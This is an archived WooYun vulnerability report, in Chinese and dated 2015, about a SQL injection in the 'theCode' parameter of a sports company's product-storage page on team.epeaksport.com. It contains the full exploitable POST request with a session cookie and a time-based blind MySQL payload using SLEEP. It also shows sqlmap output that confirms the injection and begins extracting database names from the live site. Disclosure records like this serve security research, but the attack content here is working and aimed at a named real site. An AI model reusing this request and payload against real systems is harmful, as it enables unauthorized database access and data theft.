乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-10: 细节已通知厂商并且等待厂商处理中 2015-07-15: 厂商已经主动忽略漏洞,细节向公众公开
欢迎新厂商入驻乌云
post数据包:
POST /XP001-ProductInfo/dataStorage.html HTTP/1.1X-Forwarded-For: 8.8.8.8'Content-Length: 137Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://team.epeaksport.com/Cookie: PHPSESSID=i532srvsrtg0ml6ui0icdfegc4Host: team.epeaksport.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*property%5B0%5D%5Bcode%5D=22K9&property%5B0%5D%5Bstate%5D=1&storageSort=0&theCode=E42638H
参数 thecode 可注入
这个点 跑数据实在是太慢了 就没继续了
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 108 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: property[0][code]=22K9&property[0][state]=1&storageSort=0&theCode=E42638H' AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))RKdi)-- lVIE21=6 AND '000Q6sa'='000Q6sa---[18:02:43] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0.12[18:02:43] [INFO] fetching database names[18:02:43] [INFO] fetching number of databases[18:02:43] [INFO] retrieved:[18:02:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errorsdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y1[18:03:05] [INFO] adjusting time delay to 1 second due to good response times7[18:03:05] [INFO] retrieved: informa[18:03:53] [ERROR] invalid character detected. retrying..[18:03:53] [WARNING] increasing time delay to 2 seconds[18:03:56] [ERROR] invalid character detected. retrying..[18:03:56] [WARNING] increasing time delay to 3 seconds[18:04:01] [ERROR] invalid character detected. retrying..[18:04:01] [WARNING] increasing time delay to 4 seconds[18:04:09] [ERROR] invalid character detected. retrying..[18:04:09] [WARNING] increasing time delay to 5 seconds[18:04:15] [ERROR] invalid character detected. retrying..[18:04:15] [WARNING] increasing time delay to 6 seconds[18:04:22] [ERROR] unable to properly validate last character value ('\?81')..\?81ion[18:04:47] [ERROR] invalid character detected. retrying..[18:04:47] [WARNING] increasing time delay to 2 seconds_schema[18:05:47] [INFO] retrieved: e[18:06:07] [ERROR] invalid character detected. retrying..[18:06:07] [WARNING] increasing time delay to 3 secondsp[18:07:06] [ERROR] invalid character detected. retrying..[18:07:06] [WARNING] increasing time delay to 4 secondseak[18:07:49] [INFO] retrieved:
危害等级:无影响厂商忽略
忽略时间:2015-07-15 18:12
漏洞Rank:4 (WooYun评价)
暂无